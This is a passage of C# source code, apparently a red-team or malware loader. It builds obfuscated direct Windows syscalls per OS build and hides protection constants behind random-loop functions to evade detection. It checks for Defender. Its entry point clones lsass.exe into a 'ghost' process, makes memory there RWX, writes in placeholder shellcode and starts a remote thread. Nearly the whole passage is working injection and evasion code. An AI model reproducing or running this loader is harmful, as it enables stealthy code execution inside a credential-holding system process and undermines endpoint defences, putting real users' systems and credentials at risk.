typeof(ZwOpenProcessTokenX)); 723 | return (NTSTATUS)ZwOpenProcessTokenFunc(ProcessHandle, DesiredAccess, ref TokenHandle); 724 | } 725 | } 726 | } 727 | 728 | [SuppressUnmanagedCodeSecurity] 729 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 730 | public delegate NTSTATUS ZwWriteVirtualMemoryX(IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten); 731 | public static NTSTATUS ZwWriteVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr lpBuffer, uint nSize, ref IntPtr lpNumberOfBytesWritten, ref OSVERSIONINFOEXW osVersionInfo) 732 | { 733 | byte [] syscall = GetOSVersionAndReturnSyscall( 3, ref osVersionInfo ); 734 | unsafe 735 | { 736 | fixed (byte* ptr = syscall) 737 | { 738 | IntPtr allocMemAddress = (IntPtr)ptr; 739 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 740 | UInt32 size = (uint)syscall.Length; 741 | IntPtr sizeIntPtr = (IntPtr)size; 742 | UInt32 oldprotect = 0; 743 | NTSTATUS status = ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 744 | ZwWriteVirtualMemoryX ZwWriteVirtualMemoryFunc = (ZwWriteVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwWriteVirtualMemoryX)); 745 | return (NTSTATUS)ZwWriteVirtualMemoryFunc(ProcessHandle, BaseAddress, lpBuffer, nSize, ref lpNumberOfBytesWritten); 746 | } 747 | } 748 | } 749 | 750 | [SuppressUnmanagedCodeSecurity] 751 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 752 | public delegate NTSTATUS ZwResumeThreadX( IntPtr ProcessHandle, out ulong SuspendCount ); 753 | public static NTSTATUS ZwResumeThread( IntPtr ProcessHandle, out ulong SuspendCount, ref OSVERSIONINFOEXW osVersionInfo) 754 | { 755 | byte [] syscall = GetOSVersionAndReturnSyscall( 9, ref osVersionInfo ); 756 | unsafe 757 | { 758 | fixed (byte* ptr = syscall) 759 | { 760 | IntPtr allocMemAddress = (IntPtr)ptr; 761 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 762 | UInt32 size = (uint)syscall.Length; 763 | IntPtr sizeIntPtr = (IntPtr)size; 764 | UInt32 oldprotect = 0; 765 | NTSTATUS status = ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 766 | ZwResumeThreadX ZwResumeThreadFunc = (ZwResumeThreadX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwResumeThreadX)); 767 | return (NTSTATUS)ZwResumeThreadFunc(ProcessHandle, out SuspendCount); 768 | } 769 | 770 | } 771 | } 772 | 773 | [SuppressUnmanagedCodeSecurity] 774 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 775 | public delegate NTSTATUS ZwWaitForSingleObjectX( IntPtr Object, bool Alertable, uint Timeout ); 776 | public static NTSTATUS ZwWaitForSingleObject( IntPtr Object, bool Alertable, uint Timeout, ref OSVERSIONINFOEXW osVersionInfo ) 777 | { 778 | byte [] syscall = GetOSVersionAndReturnSyscall( 10, ref osVersionInfo ); 779 | unsafe 780 | { 781 | fixed (byte* ptr = syscall) 782 | { 783 | IntPtr allocMemAddress = (IntPtr)ptr; 784 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 785 | uint size = (uint)syscall.Length; 786 | IntPtr sizeIntPtr = (IntPtr)size; 787 | UInt32 oldprotect = 0; 788 | NTSTATUS status = Protector( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect); 789 | ZwWaitForSingleObjectX ZwWaitForSingleObjectFunc = (ZwWaitForSingleObjectX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwWaitForSingleObjectX)); 790 | return (NTSTATUS)ZwWaitForSingleObjectFunc(Object, Alertable, Timeout); 791 | } 792 | 793 | } 794 | } 795 | 796 | [SuppressUnmanagedCodeSecurity] 797 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 798 | public delegate NTSTATUS RtlGetVersionX( ref OSVERSIONINFOEXW versionInfo ); 799 | public static NTSTATUS RtlGetVersion( ref OSVERSIONINFOEXW versionInfo ) 800 | { 801 | IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "RtlGetVersion", false); 802 | RtlGetVersionX RtlGetVersionFunc = (RtlGetVersionX)Marshal.GetDelegateForFunctionPointer(proc, typeof(RtlGetVersionX)); 803 | return (NTSTATUS)RtlGetVersionFunc( ref versionInfo ); 804 | } 805 | 806 | 807 | public static int Zeta() 808 | { 809 | Random number = new Random(); 810 | int code = number.Next(100); 811 | int a, b; 812 | while ( code != 32) 813 | { 814 | code = number.Next(100); 815 | } 816 | a = code; 817 | code = number.Next(100); 818 | while ( code != 32) 819 | { 820 | code = number.Next(100); 821 | } 822 | b = code; 823 | return a + b; 824 | } 825 | 826 | public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName) 827 | { 828 | IntPtr FunctionPtr = IntPtr.Zero; 829 | Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C)); 830 | Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); 831 | Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18; 832 | Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader); 833 | Int64 pExport = 0; 834 | if (Magic == 0x010b) 835 | { 836 | pExport = OptHeader + 0x60; 837 | } 838 | else 839 | { 840 | pExport = OptHeader + 0x70; 841 | } 842 | Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport); 843 | Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10)); 844 | Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); 845 | Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18)); 846 | Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C)); 847 | Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20)); 848 | Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24)); 849 | for (int i = 0; i < NumberOfNames; i++) 850 | { 851 | string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))); 852 | if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase)) 853 | { 854 | Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase; 855 | Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase)))); 856 | FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA); 857 | break; 858 | } 859 | } 860 | return FunctionPtr; 861 | } 862 | 863 | 864 | public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false) 865 | { 866 | IntPtr hModule = GetLoadedModuleAddress(DLLName); 867 | return GetExportAddress(hModule, FunctionName); 868 | } 869 | 870 | public static IntPtr GetLoadedModuleAddress(string DLLName) 871 | { 872 | ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; 873 | foreach (ProcessModule Mod in ProcModules) 874 | { 875 | if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower())) 876 | { 877 | return Mod.BaseAddress; 878 | } 879 | } 880 | return IntPtr.Zero; 881 | } 882 | 883 | public static byte [] GetOSVersionAndReturnSyscall(byte sysType, ref OSVERSIONINFOEXW osVersionInfo) 884 | { 885 | var syscall = new byte [] { 074, 138, 203, 185, 001, 001, 001, 001, 016, 006, 196 }; 886 | // Client OS Windows 10 build 1803, 1809, 1903, 1909, 2004 887 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 19041)) // 2004 888 | { 889 | // ZwOpenProcess 890 | if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 891 | // ZwCreateThreadEx 892 | if (sysType == 2) { syscall[4] = 194; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 893 | // ZwWriteVirtualMemory 894 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 895 | // ZwAllocateVirtualMemory 896 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 897 | // ZwCreateSection 898 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 899 | // ZwMapViewOfSection 900 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 901 | // ZwCreateProcess 902 | if (sysType == 7) { syscall[4] = 186; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 903 | // ZwOpenThread 904 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x12E); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 905 | // ZwResumeThread 906 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 907 | // ZwWaitForSingleObject 908 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 909 | // ZwSetContextThread 910 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) {syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x18B); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 911 | // ZwGetContextThread 912 | if (sysType == 12) { syscall[4] = 243; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 913 | // ZwClose 914 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 915 | // ZwOpenProcessToken 916 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x128); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 917 | // ZwSuspendThread 918 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1BC); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 919 | // ZwProtectVirtualMemory 920 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 921 | // ZwCreateProcessEx 922 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 923 | // NtCreateSection 924 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 925 | // NtMapViewOfSection 926 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 927 | // RtlCreateUserThread 928 | if (sysType == 20) { syscall[4] = 1; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x128); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } 929 | } else 930 | 931 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 18362 || osVersionInfo.dwBuildNumber == 18363)) // 1903 1909 932 | { 933 | // NtOpenProcess 934 | if (sysType == 1) {syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 935 | // NtCreateThreadEx 936 | if (sysType == 2) { syscall[4] = 190; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 937 | // ZwWriteVirtualMemory 938 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 939 | // NtAllocateVirtualMemory 940 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 941 | // ZwCreateSection 942 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 943 | // ZwMapViewOfSection 944 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 945 | // ZwCreateProcess 946 | if (sysType == 7) { syscall[4] = 182; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 947 | // ZwOpenThread 948 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 949 | // ZwResumeThread 950 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 951 | // ZwWaitForSingleObject 952 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 953 | // ZwSetContextThread 954 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x185); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 955 | // ZwGetContextThread 956 | if (sysType == 12) { syscall[4] = 238; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 957 | // ZwClose 958 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 959 | // ZwOpenProcessToken 960 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x123); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 961 | // ZwSuspendThread 962 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B6); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 963 | // ZwProtectVirtualMemory 964 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 965 | // ZwCreateProcessEx 966 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 967 | // NtCreateSection 968 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 969 | // NtMapViewOfSection 970 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} 971 | } else 972 | 973 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 17134)) // 1803 974 | { 975 | // ZwOpenProcess 976 | if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 977 | // ZwCreateThreadEx 978 | if (sysType == 2) { syscall[4] = 188; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 979 | // ZwWriteVirtualMemory 980 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 981 | // ZwAllocateVirtualMemory 982 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 983 | // ZwCreateSection 984 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 985 | // ZwMapViewOfSection 986 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 987 | // ZwCreateProcess 988 | if (sysType == 7) { syscall[4] = 181; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 989 | // ZwOpenThread 990 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 991 | // ZwResumeThread 992 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 993 | // ZwWaitForSingleObject 994 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 995 | // ZwSetContextThread 996 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x185); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 997 | // ZwGetContextThread 998 | if (sysType == 12) { syscall[4] = 238; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 999 | // ZwClose 1000 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1001 | // ZwOpenProcessToken 1002 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x121); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 1003 | // ZwSuspendThread 1004 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B6); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 1005 | // ZwProtectVirtualMemory 1006 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1007 | // ZwCreateProcessEx 1008 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1009 | // NtCreateSection 1010 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1011 | // NtMapViewOfSection 1012 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} 1013 | } else 1014 | 1015 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 17763)) // 1809 1016 | { 1017 | // ZwOpenProcess 1018 | if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1019 | // ZwCreateThreadEx 1020 | if (sysType == 2) { syscall[4] = 189; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1021 | // ZwWriteVirtualMemory 1022 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1023 | // ZwAllocateVirtualMemory 1024 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1025 | // ZwCreateSection 1026 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1027 | // ZwMapViewOfSection 1028 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1029 | // ZwCreateProcess 1030 | if (sysType == 7) { syscall[4] = 181; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1031 | // ZwOpenThread 1032 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 1033 | // ZwResumeThread 1034 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1035 | // ZwWaitForSingleObject 1036 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1037 | // ZwSetContextThread 1038 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x184); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 1039 | // ZwGetContextThread 1040 | if (sysType == 12) { syscall[4] = 237; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1041 | // ZwClose 1042 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1043 | // ZwOpenProcessToken 1044 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x122); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 1045 | // ZwSuspendThread 1046 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B5); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 1047 | // ZwProtectVirtualMemory 1048 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1049 | // ZwCreateProcessEx 1050 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1051 | // NtCreateSection 1052 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 1053 | // NtMapViewOfSection 1054 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} 1055 | } // 1809 1056 | 1057 | return syscall; 1058 | } 1059 | 1060 | 1061 | public static int FindClonedProcess(string processName) 1062 | { 1063 | int result = 0; 1064 | ManagementClass mClass = new ManagementClass("Win32_Process"); 1065 | foreach (ManagementObject mObj in mClass.GetInstances()) 1066 | { 1067 | if ( mObj["Name"].Equals(processName) ) 1068 | { 1069 | result = (int)Convert.ToInt32(mObj["ProcessId"]); 1070 | } 1071 | } 1072 | return result; 1073 | } 1074 | 1075 | public static int ReturnUpper() 1076 | { 1077 | Random number = new Random(); 1078 | int code = number.Next(200); 1079 | int a, b; 1080 | while ( code != 100) 1081 | { 1082 | code = number.Next(200); 1083 | } 1084 | a = code; 1085 | code = number.Next(100); 1086 | while ( code != 51) 1087 | { 1088 | code = number.Next(100); 1089 | } 1090 | b = code; 1091 | return a + b + 2097000; 1092 | } 1093 | 1094 | public static int ReturnRight() 1095 | { 1096 | Random number = new Random(); 1097 | int code = number.Next(100); 1098 | int a, b; 1099 | while ( code != 60) 1100 | { 1101 | code = number.Next(100); 1102 | } 1103 | a = code; 1104 | code = number.Next(100); 1105 | while ( code != 4) 1106 | { 1107 | code = number.Next(100); 1108 | } 1109 | b = code; 1110 | return a + b; 1111 | } 1112 | 1113 | public static bool IsDefenderRunning() 1114 | { 1115 | bool result = false; 1116 | ManagementClass mClass = new ManagementClass("Win32_Process"); 1117 | foreach (ManagementObject mObj in mClass.GetInstances()) 1118 | { 1119 | if ( mObj["Name"].Equals("MsMpEng.exe") ) 1120 | { 1121 | string str1 = Convert.ToString( mObj["CommandLine"] ); 1122 | if (str1.Contains("") & str1.Contains("")) 1123 | { 1124 | result = true; 1125 | break; 1126 | } 1127 | } 1128 | } 1129 | return result; 1130 | } 1131 | 1132 | public static void DllMain() // dll entrypoint 1133 | { 1134 | byte[] scode = new byte[ SHELLCODE LENGTH HERE] { INSERT YOUR SHELLCODE HERE }; 1135 | 1136 | OSVERSIONINFOEXW osVersionInfo = new OSVERSIONINFOEXW { dwOSVersionInfoSize = Marshal.SizeOf(typeof(OSVERSIONINFOEXW)) }; 1137 | RtlGetVersion(ref osVersionInfo); 1138 | 1139 | OBJECT_ATTRIBUTES ObjAttr = new OBJECT_ATTRIBUTES 1140 | { 1141 | Length = (ulong)Marshal.SizeOf(typeof(OBJECT_ATTRIBUTES)), 1142 | RootDirectory = IntPtr.Zero, 1143 | ObjectName = IntPtr.Zero, 1144 | Attributes = 0x00000020, // OBJ_EXCLUSIVE 1145 | SecurityDescriptor = IntPtr.Zero, 1146 | SecurityQualityOfService = IntPtr.Zero 1147 | }; 1148 | 1149 | int ProcId = FindClonedProcess("lsass.exe"); 1150 | 1151 | Process targetProcess = Process.GetProcessById( ProcId ); 1152 | CLIENT_ID clientid = new CLIENT_ID(); 1153 | clientid.UniqueThread = new IntPtr(targetProcess.Threads[0].Id); 1154 | clientid.UniqueProcess = new IntPtr(targetProcess.Id); 1155 | IntPtr procHandle = (IntPtr)clientid.UniqueProcess; 1156 | 1157 | ZwOpenProcess( out procHandle, ProcessAccessFlags.All, new OBJECT_ATTRIBUTES(), ref clientid, ref osVersionInfo ); 1158 | 1159 | IntPtr ProcessHandle = IntPtr.Zero; 1160 | ZwCreateProcess( out ProcessHandle, ACCESS_MASK.GENERIC_ALL, ObjAttr, procHandle, true, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref osVersionInfo ); 1161 | 1162 | clientid.UniqueThread = IntPtr.Zero; // At this time there exist no thread in our ghost LSASS process, so this must be Zero. 1163 | clientid.UniqueProcess = new IntPtr(ProcId); 1164 | 1165 | IntPtr ptrToGhostLSASS = IntPtr.Zero; 1166 | ZwOpenProcess( out ptrToGhostLSASS, ProcessAccessFlags.All, new OBJECT_ATTRIBUTES(), ref clientid, ref osVersionInfo ); 1167 | 1168 | IntPtr allocMemAddress = new IntPtr(); 1169 | IntPtr scodeSize = (IntPtr)(UInt32)scode.Length; 1170 | 1171 | // Allocate memory without RWX 1172 | ZwAllocateVirtualMemory( ptrToGhostLSASS, ref allocMemAddress, new IntPtr(0), ref scodeSize, 0x1000 | 0x2000, 0x10, ref osVersionInfo ); 1173 | 1174 | // Change allocated memory to RWX 1175 | UInt32 BytesWritten = 0; 1176 | ZwProtectVirtualMemory( ptrToGhostLSASS, ref allocMemAddress, ref scodeSize, (UInt32)ReturnRight(), ref BytesWritten, ref osVersionInfo ); 1177 | 1178 | IntPtr bytesWritten = IntPtr.Zero; 1179 | IntPtr uPtr = Marshal.AllocHGlobal(scode.Length); 1180 | Marshal.Copy(scode, 0, uPtr, scode.Length); 1181 | ZwWriteVirtualMemory( ptrToGhostLSASS, ref allocMemAddress, uPtr, (UInt32)(scodeSize), ref bytesWritten, ref osVersionInfo ); 1182 | Marshal.FreeHGlobal(uPtr); 1183 | 1184 | IntPtr hRemoteThread = IntPtr.Zero; 1185 | ZwCreateThreadEx( out hRemoteThread, (UInt32)ReturnUpper(), IntPtr.Zero, ptrToGhostLSASS, allocMemAddress, IntPtr.Zero, 0, 0, 0, 0, IntPtr.Zero, ref osVersionInfo ); 1186 | 1187 | ZwClose(procHandle, ref osVersionInfo); 1188 | ZwClose(ProcessHandle, ref osVersionInfo); 1189 | ZwClose(ptrToGhostLSASS, ref osVersionInfo); 1190 | ZwClose(hRemoteThread, ref osVersionInfo); 1191 | } 1192 | } 1193 | } 1194 | --------------------------------------------------------------------------------